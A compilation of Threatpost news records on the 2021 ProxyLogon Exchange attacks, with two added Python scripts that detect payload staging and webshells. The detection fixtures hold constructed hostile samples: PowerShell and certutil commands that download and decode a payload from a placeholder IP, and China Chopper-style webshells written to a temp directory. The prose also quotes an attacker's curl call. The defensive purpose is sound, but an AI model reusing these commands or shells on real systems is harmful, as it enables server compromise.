Earlier this week Microsoft said that it had spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>).

The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065. When chained together, they allow remote authentication bypass and remote code execution. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.

The attacks are being carried out in part by a China-linked advanced persistent threat (APT) called Hafnium, Microsoft said – but multiple other security firms have observed attacks from other groups and against a widespread swathe of targets.

Researchers at Huntress Labs, for instance, told Threatpost that they have discovered more than 200 web shells deployed across thousands of vulnerable servers (with antivirus and endpoint detection and response installed), and the company expects this number to keep rising.

“The team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,” a spokesperson at Huntress told Threatpost.

Meanwhile, researchers at ESET tweeted that CVE-2021-26855 was being actively exploited in the wild by at least three APTs besides Hafnium.

“Among them, we identified #LuckyMouse, #Tick, #Calypso and a few additional yet-unclassified clusters,” it tweeted, adding that while most attacks are against targets in the U.S., “we’ve seen attacks against servers in Europe, Asia and the Middle East.”

> Most targets are located in the US but we’ve seen attacks against servers in Europe, Asia and the Middle East. Targeted verticals include governments, law firms, private companies and medical facilities. 3/5 [pic.twitter.com/kwxjYPeMlm](<https://t.co/kwxjYPeMlm>)
> 
> — ESET research (@ESETresearch) [March 2, 2021](<https://twitter.com/ESETresearch/status/1366862951156695047?ref_src=twsrc%5Etfw>)

The vulnerabilities only exist in on-premises versions of Exchange Server and don’t affect Office 365 (Exchange Online). Yet despite the move to the cloud, there are plenty of on-premises servers still in service, leaving a wide pool of targets.

“With organizations migrating to Microsoft Office 365 en masse over the last few years, it’s easy to forget that on-premises Exchange servers are still in service,” Saryu Nayyar, CEO, Gurucul, said via email. “Some organizations, notably in government, can’t migrate their applications to the cloud due to policy or regulation, which means we will see on-premises servers for some time to come.”

## **CISA Mandates Patching Exchange Servers**

CISA is requiring federal agencies to take several steps in light of the spreading attacks.

First, they should take a thorough inventory of all on-premises Microsoft Exchange Servers in their environments, and then perform forensics to identify any existing compromises. Any compromises must be reported to CISA for remediation.

The forensics step would include collecting “system memory, system web logs, windows event logs and all registry hives. Agencies shall then examine the artifacts for indications of compromise or anomalous behavior, such as credential dumping and other activities.”

If no indicators of compromise have been found, agencies must immediately patch, CISA added. And if agencies can’t immediately patch, then they must take their Microsoft Exchange Servers offline.

All agencies have also been told to submit an initial report by Friday on their current situation.

“[This] highlights the increasing frequency of attacks orchestrated by nation states,” said Steve Forbes, government cybersecurity expert at Nominet, via email. “The increasing role of government agencies in leading a coordinated response against attacks. CISA’s directive for agencies to report back on their level of exposure, apply security fixes or disconnect the program is the latest in a series of increasingly regular emergency directives that the agency has issued since it was established two years ago. Vulnerabilities like these demonstrate the necessity for these coordinated national protective measures to efficiently and effectively mitigate the effects of attacks that could have major national security implications.”

**Source record:** “CISA Orders Fed Agencies to Patch Exchange Servers” (Threatpost, bulletin family: info); published 2021-03-04T17:08:36, modified 2021-03-04T17:08:36; CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; CVSS: none assigned (score 0.0, vector NONE; cvss2/cvss3 empty); id THREATPOST:54430D004FBAE464FB7480BC724DBCC8; <https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>

**Next record** (Threatpost; last seen 2021-04-15T12:28:24):

Cryptojacking can be added to the list of threats that face any [unpatched Exchange servers](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) that remain vulnerable to the now-infamous ProxyLogon exploit, new
research has found.

Researchers discovered threat actors using Exchange servers compromised via the highly publicized exploit chain (which has drawn a [barrage of attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) from advanced persistent threat (APT) groups infecting systems with everything from [ransomware](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>) to webshells) to host Monero cryptomining malware, according to [a report](<https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/>) posted online this week by SophosLabs.

“An unknown attacker has been attempting to leverage what’s now known as the ProxyLogon exploit to foist a malicious Monero cryptominer onto Exchange servers, with the payload being hosted on a compromised Exchange server,” Sophos principal researcher Andrew Brandt wrote in the report.

Researchers were inspecting telemetry when they discovered what they deemed an “unusual attack” targeting a customer’s Exchange server. Sophos researchers Fraser Howard and Simon Porter were instrumental in the discovery and analysis of the novel threat, Brandt acknowledged.

Researchers said they detected the executables associated with this attack as Mal/Inject-GV and XMR-Stak Miner (PUA), according to the report. Researchers published a list of [indicators of compromise](<https://github.com/sophoslabs/IoCs/blob/master/PUA-QuickCPU_xmr-stak.csv>) on the SophosLabs GitHub page to help organizations recognize if they’ve been attacked in this way.

## **How It Works**

The attack as observed by researchers began with a PowerShell command to retrieve a file named win_r.zip from another compromised server’s Outlook Web Access logon path (/owa/auth), according to the report. Under closer inspection, the .zip file was not a compressed archive at all but a batch script that then invoked the built-in Windows certutil.exe program to download two additional files, win_s.zip and win_d.zip, which likewise were not compressed archives.

The first file is written out to the filesystem as QuickCPU.b64, an executable payload in base64 that can be decoded by the certutil application, which by design can decode base64-encoded security certificates, researchers observed.

The batch script then runs another command that outputs the decoded executable into the same directory. Once decoded, the batch script runs the executable, which extracts the miner and configuration data from the QuickCPU.dat file, injects it into a system process, and then deletes any evidence that it was there, according to the report.

The executable in the attack appears to contain a modified version of a tool publicly available on GitHub called PEx64-Injector, which is [described](<https://github.com/0xyg3n/PEx64-Injector>) on its GitHub page as having the ability to “migrate any x64 exe to any x64 process” with “no administrator privileges required,” according to the report.

Once the file runs on an infected system, it extracts the contents of the QuickCPU.dat file, which includes an installer for the cryptominer and its configuration, temporarily to the filesystem. It then configures the miner, injects it into a running process, then quits, according to the report. “The batch file then deletes the evidence and the miner remains running in memory, injected into a process already running on the system,” Brandt wrote.

Researchers observed the cryptominer receiving funds on March 9, which is when Microsoft also released updates to Exchange to patch the flaws.
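The staging chain described above leaves two kinds of evidence a defender can search for, and the following is an added example of that detection logic, written for this page rather than taken from the Sophos report or its IoC list. On the server that hosts the payloads, the IIS log shows files with archive or base64 extensions being served from /owa/auth/, a path that should only serve logon pages and their static assets. On the server that fetches them, process-creation telemetry (Windows Security event 4688 or an EDR feed) shows certutil.exe being used to download and base64-decode files, and a PowerShell download from another server's /owa/auth/ path. The log lines, command lines, hostnames and IP addresses below are constructed samples; the report names the files (win_r.zip, win_s.zip, win_d.zip, QuickCPU.b64) but not the exact command lines, so the certutil switches shown (-urlcache -split -f, -decode) are the tool's standard download and decode syntax and an assumption here. The same web-log review is the kind of check the CISA directive's "system web logs" step calls for.

```python
"""Detection logic for the certutil-based cryptominer staging chain.

Added example, not code from the Sophos report. Data sources (all constructed):
  * IIS W3C log lines from the Exchange server that *hosts* the payloads;
  * process-creation records (image + command line, as from Security event
    4688 or an EDR) from the Exchange server that *fetches* them.
The certutil switches (-urlcache -split -f, -decode) are the tool's usual
download/decode syntax; the report does not quote the exact command lines.
"""
import re

# --- constructed IIS log excerpt (W3C extended format; IIS writes spaces in the UA as '+') ---
IIS_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2021-03-09 10:12:01 10.0.0.5 GET /owa/auth/logon.aspx - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 200
2021-03-09 10:12:44 10.0.0.5 GET /owa/auth/win_r.zip - 198.51.100.23 - 200
2021-03-09 10:13:02 10.0.0.5 GET /owa/auth/win_s.zip - 198.51.100.23 Microsoft-CryptoAPI/10.0 200
2021-03-09 10:13:03 10.0.0.5 GET /owa/auth/win_d.zip - 198.51.100.23 Microsoft-CryptoAPI/10.0 200
2021-03-09 10:14:40 10.0.0.5 GET /owa/auth/win_r.zip - 192.0.2.44 python-requests/2.25.1 404
2021-03-09 10:15:10 10.0.0.5 POST /owa/auth.owa - 203.0.113.7 Mozilla/5.0+(Windows+NT+10.0) 302
"""

# --- constructed process-creation records from a server that fetched the payloads ---
PROCESS_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
                "'http://198.51.100.9/owa/auth/win_r.zip','C:\\Windows\\Temp\\win_r.zip')\""},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.9/owa/auth/win_s.zip "
                "C:\\Windows\\Temp\\QuickCPU.b64"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -decode C:\\Windows\\Temp\\QuickCPU.b64 C:\\Windows\\Temp\\QuickCPU.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify -urlfetch C:\\certs\\mail.cer"},      # legitimate admin use
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -c Get-MailboxDatabase -Status"},               # legitimate admin use
]

# Files that have no business being served from the OWA logon path.
PAYLOAD_EXT = re.compile(r"\.(zip|b64|dat|bat|exe)$", re.IGNORECASE)
# certutil used as a downloader or base64 decoder (not its -verify/-urlfetch certificate checks).
CERTUTIL_ABUSE = re.compile(r"\bcertutil(\.exe)?\b.*?\s-(urlcache|decode|encode)\b", re.IGNORECASE)
# Any process pulling a payload-like file from some server's /owa/auth/.
OWA_STAGING_URL = re.compile(r"https?://[^\s'\"]+/owa/auth/[^\s'\"]+?\.(zip|b64|dat)\b", re.IGNORECASE)


def parse_iis(text):
    """Parse W3C-format IIS log text into dicts keyed by the #Fields header."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split(" ")
        if fields and len(values) == len(fields):   # skip malformed rows rather than crash
            rows.append(dict(zip(fields, values)))
    return rows


def find_staged_payloads(rows):
    """Return (client_ip, uri) for payload-like files successfully served from /owa/auth/."""
    hits = []
    for r in rows:
        stem = r.get("cs-uri-stem", "")
        if (stem.lower().startswith("/owa/auth/") and PAYLOAD_EXT.search(stem)
                and r.get("sc-status") == "200"):
            hits.append((r.get("c-ip"), stem))
    return hits


def find_certutil_abuse(events):
    """Return (cmdline, [reasons]) for process events matching the staging pattern."""
    findings = []
    for e in events:
        cmd = e["cmdline"]
        reasons = []
        if CERTUTIL_ABUSE.search(cmd):
            reasons.append("certutil download/decode")
        if OWA_STAGING_URL.search(cmd):
            reasons.append("payload fetched from another server's /owa/auth/")
        if reasons:
            findings.append((cmd, reasons))
    return findings


if __name__ == "__main__":
    for ip, uri in find_staged_payloads(parse_iis(IIS_LOG)):
        print(f"served payload {uri} to {ip}")
    for cmd, why in find_certutil_abuse(PROCESS_EVENTS):
        print(f"{'; '.join(why)}: {cmd}")
```

The status check matters: the 404 from the scanner in the sample is not a finding, while the three 200s to one client are exactly the hosting-side trace the report describes. On the fetching side the -verify -urlfetch record is deliberately left unflagged, since administrators do run certutil that way to check certificate chains.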
Though the attacker lost several servers after this date and the output from the miner decreased, other servers that were gained thereafter more than made up for the early losses, according to the report.

## **Exploit-Chain History**

The ProxyLogon problem started for Microsoft in early March when the company said it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. The exploit chain comprises four flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065).

Together the flaws create a pre-authentication remote code execution (RCE) exploit, meaning attackers can take over servers without knowing any valid account credentials. This gave them access to email communications and the opportunity to install a web shell for further exploitation within the environment.

As previously mentioned, Microsoft released an out-of-band update [soon after](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in its scramble to patch the flaws in the ProxyLogon chain; however, while the company boasted later that month that 92 percent of affected machines already had been patched, much damage had already been done, and unpatched systems likely exist that remain vulnerable.

**Source record:** “Attackers Target ProxyLogon Exploit to Install Cryptojacker” (Threatpost, bulletin family: info); published 2021-04-15T12:19:13, modified 2021-04-15T12:19:13; CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P; cvss2/cvss3 empty); id THREATPOST:B787E57D67AB2F76B899BCC525FF6870; <https://threatpost.com/attackers-target-proxylogon-cryptojacker/165418/>

**Next record** (Threatpost; last seen 2021-03-11T21:58:44):

Recently patched Microsoft Exchange vulnerabilities are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world. Overall exploitation activity is snowballing, according to researchers.

Microsoft said in early March that it [had spotted multiple zero-day exploits](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) in the wild being used to attack on-premises versions of Microsoft Exchange Server. Four flaws can be chained together to create a pre-authentication remote code execution (RCE) exploit – meaning that attackers can take over servers without knowing any valid account credentials.
This gives them access to email communications and the opportunity to install a webshell for further exploitation within the environment.

And indeed, adversaries from the Chinese APT known as Hafnium were able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.

Microsoft was spurred to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) for the exploited bugs, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

## **Rapidly Spreading Email Server Attacks**

Microsoft said last week that the attacks were “limited and targeted.” But that’s certainly no longer the case. Other security companies have [continued to say](<https://twitter.com/0xDUDE/status/1369302347617349642>) they have seen much broader, escalating activity with mass numbers of servers being scanned and attacked.

ESET researchers [had confirmed this](<https://threatpost.com/cisa-federal-agencies-patch-exchange-servers/164499/>) as well, and on Wednesday the company announced that it had pinpointed at least 10 APTs going after the bugs, including Calypso, LuckyMouse, Tick and the Winnti Group.

“On Feb. 28, we noticed that the vulnerabilities were used by other threat actors, starting with Tick and quickly joined by LuckyMouse, Calypso and the Winnti Group,” according to [the writeup](<https://www.welivesecurity.com/2021/03/10/exchange-servers-under-siege-10-apt-groups/>). “This suggests that multiple threat actors gained access to the details of the vulnerabilities before the release of the patch, which means we can discard the possibility that they built an exploit by reverse-engineering Microsoft updates.”

> The [@DIVDnl](<https://twitter.com/DIVDnl?ref_src=twsrc%5Etfw>) scanned over 250K Exchange servers. Sent over 46k emails to the owners. The amount of vulnerable servers is going down. The number of compromised systems is going up. More organizations start investigating their systems for [#Hafnium](<https://twitter.com/hashtag/Hafnium?src=hash&ref_src=twsrc%5Etfw>) exploits.<https://t.co/XmQhHd7OA9>
> 
> — Victor Gevers (@0xDUDE) [March 9, 2021](<https://twitter.com/0xDUDE/status/1369302347617349642?ref_src=twsrc%5Etfw>)

This activity was quickly followed by a raft of other groups, including CactusPete and Mikroceen, “scanning and compromising Exchange servers en masse,” according to ESET.

“We have already detected webshells on more than 5,000 email servers [in more than 115 countries] as of the time of writing, and according to public sources, [several important organizations](<https://twitter.com/sundhaug92/status/1369669037924483087>), such as the European Banking Authority, suffered from this attack,” according to the ESET report.

It also appears that threat groups are piggybacking on each other’s work. For instance, in some cases the webshells were dropped into Offline Address Book (OAB) configuration files, and they appeared to be accessed by more than one group.

“We cannot discount the possibility that some threat actors might have hijacked the webshells dropped by other groups rather than directly using the exploit,” said ESET researchers. “Once the vulnerability had been exploited and the webshell was in place, we observed attempts to install additional malware through it.
We also noticed in some cases that several threat actors were targeting the same organization.”

## **Zero-Day Activity Targeting Microsoft Exchange Bugs**

ESET has documented a raft of activity targeting the four vulnerabilities, including multiple zero-day compromises before Microsoft rolled patches out.

For instance, Tick, which has been infiltrating organizations primarily in Japan and South Korea since 2008, was seen compromising the webserver of an IT company based in East Asia two days before Microsoft released its patches for the Exchange flaws.

“We then observed a Delphi backdoor, highly similar to previous Delphi implants used by the group,” ESET researchers said. “Its main objective seems to be intellectual property and classified information theft.”

A timeline of ProxyLogon activity. Source: ESET.

One day before the patches were released, LuckyMouse (a.k.a. APT27 or Emissary Panda) compromised the email server of a governmental entity in the Middle East, ESET observed. The group is cyberespionage-focused and is known for breaching multiple government networks in Central Asia and the Middle East, along with transnational organizations like the International Civil Aviation Organization (ICAO) in 2016.

“LuckyMouse operators started by dropping the Nbtscan tool in C:\programdata\, then installed a variant of the ReGeorg webshell and issued a GET request to http://34.90.207[.]23/ip using curl,” according to ESET’s report. “Finally, they attempted to install their SysUpdate (a.k.a. Soldier) modular backdoor.”

That same day, still in the zero-day period, the Calypso spy group compromised the email servers of governmental entities in the Middle East and in South America. And in the following days, it targeted additional servers at governmental entities and private companies in Africa, Asia and Europe using the exploit.

“As part of these attacks, two different backdoors were observed: a variant of PlugX specific to the group (Win32/Korplug.ED) and a custom backdoor that we detect as Win32/Agent.UFX (known as Whitebird in a Dr.Web report),” according to ESET. “These tools are loaded using DLL search-order hijacking against legitimate executables (also dropped by the attackers).”

ESET also observed the Winnti Group exploiting the bugs, a few hours before Microsoft released the patches. Winnti (a.k.a. APT41 or Barium, known for [high-profile supply-chain attacks against the video game and software industries](<https://threatpost.com/ransomware-major-gaming-companies-apt27/162735/>)) compromised the email servers of an oil company and a construction equipment company, both based in East Asia.

“The attackers started by dropping webshells,” according to ESET. “At one of the compromised victims we observed a [PlugX RAT](<https://threatpost.com/ta416-apt-plugx-malware-variant/161505/>) sample (also known as Korplug)…at the second victim, we observed a loader that is highly similar to previous Winnti v.4 malware loaders…used to decrypt an encrypted payload from disk and execute it. Additionally, we observed various Mimikatz and password dumping tools.”

After the patches rolled out and the vulnerabilities were publicly disclosed, [CactusPete (a.k.a. Tonto Team)](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>) compromised the email servers of an Eastern Europe-based procurement company and a cybersecurity consulting company, ESET noted. The attacks resulted in the ShadowPad loader being implanted, along with a variant of the Bisonal remote-access trojan (RAT).

And, the Mikroceen APT group (a.k.a.
Vicious Panda) compromised the Exchange server of a utility company in Central Asia, which is the region it mainly targets, a day after the patches were released.

## **Unattributed Exploitation Activity**

A cluster of pre-patch activity that ESET dubbed Websiic was also seen targeting seven email servers belonging to private companies (in the domains of IT, telecommunications and engineering) in Asia and a governmental body in Eastern Europe.

ESET also said it has seen a spate of unattributed [ShadowPad activity](<https://threatpost.com/ccleaner-attackers-intended-to-deploy-keylogger-in-third-stage/130358/>) resulting in the compromise of email servers at a software development company based in East Asia and a real estate company based in the Middle East. ShadowPad is a cyber-attack platform that criminals deploy in networks to gain remote control capabilities, keylogging functionality and data exfiltration.

And, it saw another cluster of activity targeting around 650 servers, mostly in Germany and other European countries, the U.K. and the United States. All of the latter attacks featured a first-stage webshell called RedirSuiteServerProxy, researchers said.

And finally, on four email servers located in Asia and South America, webshells were used to install IIS backdoors after the patches came out, researchers said.

The groundswell of activity, particularly on the zero-day front, brings up the question of how knowledge of the vulnerabilities was spread between threat groups.

“Our ongoing research shows that not only Hafnium has been using the recent RCE vulnerability in Exchange, but that multiple APTs have access to the exploit, and some even did so prior to the patch release,” ESET concluded. “It is still unclear how the distribution of the exploit happened, but it is inevitable that more and more threat actors, including ransomware operators, will have access to it sooner or later.”

Organizations with on-premises Microsoft Exchange servers should patch as soon as possible, researchers noted – if it’s not already too late.

“The best mitigation advice for network defenders is to apply the relevant patches,” said Joe Slowik, senior security researcher with DomainTools, in a [Wednesday post](<https://www.domaintools.com/resources/blog/examining-exchange-exploitation-and-its-lessons-for-defenders>). “However, given the speed in which adversaries weaponized these vulnerabilities and the extensive period of time pre-disclosure when these were actively exploited, many organizations will likely need to shift into response and remediation activities — including attack surface reduction and active threat hunting — to counter existing intrusions.”

**Source record:** “Microsoft Exchange Servers Face APT Attack Tsunami” (Threatpost, bulletin family: info); published 2021-03-11T18:01:16, modified 2021-03-11T18:01:16; CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P; cvss2/cvss3 empty); id THREATPOST:CAA77BB0CF0093962ECDD09004546CA3; <https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>

**Next record** (Threatpost; last seen 2021-03-16T14:17:03):

Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.

The ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit – meaning that attackers can take over servers without knowing any valid account credentials.

The flaws give attackers the opportunity to install a webshell for further exploitation within the environment — and now, researchers say attackers are downloading the new ransomware strain (a.k.a.
Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.

“We have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,” Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.

## **DearCry Ransomware**

DearCry first came onto the infosec space’s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a “sudden swarm” of submissions to his ransomware identification website, ID-Ransomware.

The ransomware uses the extension “.CRYPT” when encrypting files, as well as a filemarker “DEARCRY!” in the string for each encrypted file.

[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.

According to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called ‘readme.txt’) after initially infecting the victim – which contains two email addresses for the threat actors and demands a ransom payment of $16,000.

Meanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S.
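ESET's observation earlier on this page that webshells were dropped into the OAB configuration and then reused by several groups, together with the DearCry artefacts just described (the .CRYPT extension and the DEARCRY! file marker), give a responder two concrete things to hunt for on disk. The following is an added example of that hunt, written for this page rather than taken from ESET, Microsoft or the DearCry reporting. It builds a constructed copy of the default Exchange/IIS directory layout in a temporary directory, plants the classic China Chopper one-liner in the OAB directory, a generic request-parameter-to-Process.Start shell under aspnet_client (assumed here as a common drop location) and one DearCry-style encrypted file, then runs both hunts over the tree. The install paths, the sample shells, the aspnet_client and ecp drop paths, and the assumption that the DEARCRY! marker sits within the first 4 KB of an encrypted file are this example's own, not the page's.

```python
"""Hunt for ProxyLogon post-exploitation artefacts on an Exchange server's disk.

Added example, not code from ESET, Microsoft or the DearCry reporting. Two hunts
over one directory tree:
  * webshell candidates: ASP.NET script files in the IIS/Exchange paths used
    for drops (the OAB virtual directory, owa/auth, aspnet_client, ecp), flagged
    on content (the China Chopper one-liner, request-parameter-to-exec shapes)
    or on being a new file in one of those paths;
  * DearCry artefacts: files renamed to .CRYPT that carry the DEARCRY! marker.
The tree is built in a temp dir so the script runs anywhere. The Exchange
install layout is the default one and the marker-in-first-4KB check is an
assumption; the reporting only says the marker is present in each file.
"""
import os
import re
import tempfile
import time
from pathlib import Path

SCRIPT_EXT = {".aspx", ".ashx", ".asmx", ".asp"}
# Directory fragments (normalised to '/', lower-case) where drops were seen or are expected.
DROP_DIRS = ("/aspnet_client/", "/owa/auth/", "/oab/", "/ecp/")
SHELL_PATTERNS = {
    # <%eval(Request.Item["password"],"unsafe");%> is the classic China Chopper ASPX shell
    "china_chopper": re.compile(r'eval\s*\(\s*Request\.Item\[', re.IGNORECASE),
    # a request parameter flows into something that executes it
    "request_to_exec": re.compile(
        r'Request(\.Form|\.QueryString|\.Item)?\s*\[.*?(Process\.Start|Assembly\.Load|Eval\()',
        re.IGNORECASE | re.DOTALL),
}
DEARCRY_MARKER = b"DEARCRY!"


def _norm(path):
    """Lower-case, forward-slash form of a directory path with a trailing slash."""
    return str(path).replace("\\", "/").lower() + "/"


def hunt_webshells(root, since_epoch):
    """Return sorted (relative_path, [reasons]) for script files worth a look."""
    root = Path(root)
    findings = []
    for p in root.rglob("*"):
        if not p.is_file() or p.suffix.lower() not in SCRIPT_EXT:
            continue
        reasons = []
        text = p.read_text(encoding="utf-8", errors="replace")
        for name, pat in SHELL_PATTERNS.items():
            if pat.search(text):
                reasons.append(name)
        # A script that appeared in a drop path after the patch window is suspect even if it
        # matches no known pattern; shipped files such as logon.aspx predate it and are skipped.
        if any(d in _norm(p.parent) for d in DROP_DIRS) and p.stat().st_mtime >= since_epoch:
            reasons.append("new_file_in_drop_path")
        if reasons:
            findings.append((str(p.relative_to(root)), reasons))
    return sorted(findings)


def hunt_dearcry(root):
    """Return sorted (relative_path, marker_present) for every .CRYPT file under root."""
    root = Path(root)
    hits = []
    for p in root.rglob("*.CRYPT"):
        if p.is_file():
            with p.open("rb") as f:
                head = f.read(4096)
            hits.append((str(p.relative_to(root)), DEARCRY_MARKER in head))
    return sorted(hits)


def build_sample_tree(root):
    """Constructed fixture: default Exchange/IIS layout, one shipped page, three planted artefacts."""
    root = Path(root)
    exch = root / "Program Files/Microsoft/Exchange Server/V15/FrontEnd/HttpProxy"
    files = {
        exch / "owa/auth/logon.aspx": '<%@ Page Language="C#" %><html>OWA logon</html>',
        exch / "OAB/oab.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
        root / "inetpub/wwwroot/aspnet_client/system_web/help.aspx":
            '<%@ Page Language="C#" %><% var c = Request["cmd"]; '
            'System.Diagnostics.Process.Start("cmd.exe", "/c " + c); %>',
        root / "Users/Public/report.docx.CRYPT": DEARCRY_MARKER + b"\x00" * 64,
    }
    for path, content in files.items():
        path.parent.mkdir(parents=True, exist_ok=True)
        if isinstance(content, bytes):
            path.write_bytes(content)
        else:
            path.write_text(content, encoding="utf-8")
    old = time.time() - 400 * 86400           # logon.aspx shipped long before the patch window
    os.utime(exch / "owa/auth/logon.aspx", (old, old))


def run_demo():
    """Build the fixture in a temp dir and run both hunts, treating the last 30 days as 'new'."""
    with tempfile.TemporaryDirectory() as d:
        build_sample_tree(d)
        return hunt_webshells(d, time.time() - 30 * 86400), hunt_dearcry(d)


if __name__ == "__main__":
    shells, crypt = run_demo()
    for path, why in shells:
        print("webshell candidate:", path, why)
    for path, marked in crypt:
        print("DearCry file:", path, "marker present" if marked else "no marker")
```

The recency rule is what catches shells that match no signature, which matters given ESET's note that several groups were dropping and reusing shells in the same directories; on a live server the "since" value would be the last known-good date for that host, and anything the hunt returns should be collected before the server is patched or rebuilt, since the DearCry note and the shells are the evidence of prior compromise the CISA directive asks agencies to look for.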
On Twitter, MalwareHunterTeam said the ransomware is “not that very widespread (yet?).” Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here](<https://twitter.com/malwrhunterteam/status/1370271414855593986>)).

## **Microsoft Exchange Attacks Doubling Every Few Hours**

Exploitation activity for the recently patched Exchange flaws continues to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) that the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.

[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said that in the past 24 hours alone, the number of exploitation attempts on organizations has doubled every two to three hours.

Researchers said they saw hundreds of exploit attempts against organizations worldwide – with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).

Researchers warned that exploitation activity will continue — and urged companies that have not already done so to patch.

“Since the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,” according to Check Point researchers. “Global experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.”

**Source record:** “Microsoft Exchange Exploits Pave a Ransomware Path” (Threatpost, bulletin family: info); published 2021-03-12T16:26:07, modified 2021-03-12T16:26:07; CVEs: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065; CVSS 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P; cvss2/cvss3 empty); id THREATPOST:DC270F423257A4E0C44191BE365F25CB; <https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>

**Next record** (Threatpost; last seen 2021-08-26T23:21:31):

Microsoft has broken its silence on the [recent barrage of attacks](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) on the ProxyShell vulnerabilities that were [highlighted](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) by a researcher at Black Hat earlier this month.

The company [released an advisory](<https://techcommunity.microsoft.com/t5/exchange-team-blog/proxyshell-vulnerabilities-and-your-exchange-server/ba-p/2684705>) late Wednesday letting customers know that threat actors may use unpatched Exchange servers “to deploy ransomware or conduct other
post-exploitation activities” and urging them to update immediately.

“Our recommendation, as always, is to install the latest CU and SU on all your Exchange servers to ensure that you are protected against the latest threats,” the company said. “Please update now!”

